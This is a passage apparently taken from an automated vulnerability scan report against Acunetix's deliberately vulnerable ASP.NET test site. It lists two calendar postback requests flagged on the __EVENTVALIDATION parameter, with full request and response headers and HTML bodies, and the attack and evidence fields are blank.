</TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8228&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAw3aZY9oIZGRkdeoBDIcMNgl46BMlNtESG%2FEBmcM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLFk8OMAgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bjd%2F6t5EgfKBvYaL1n15rQ2EGBDA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:51 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAw3aZY9oIZGRkdeoBDIcMNgl46BMlNtESG/EBmcM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLFk8OMAgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+jd/6t5EgfKBvYaL1n15rQ2EGBDA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:White" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1191 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,191 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8276&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAl2pRidoIZGRkN%2Bcv%2F%2BqfiEyR8nWFHu3%2Fgey5Opo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLfsNiBBALtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgcS8yw9W3%2B%2BI542MdLtXQTS3iCN
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:10 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAl2pRidoIZGRkN+cv/+qfiEyR8nWFHu3/gey5Opo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLfsNiBBALtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgcS8yw9W3++I542MdLtXQTS3iCN" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:White" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a 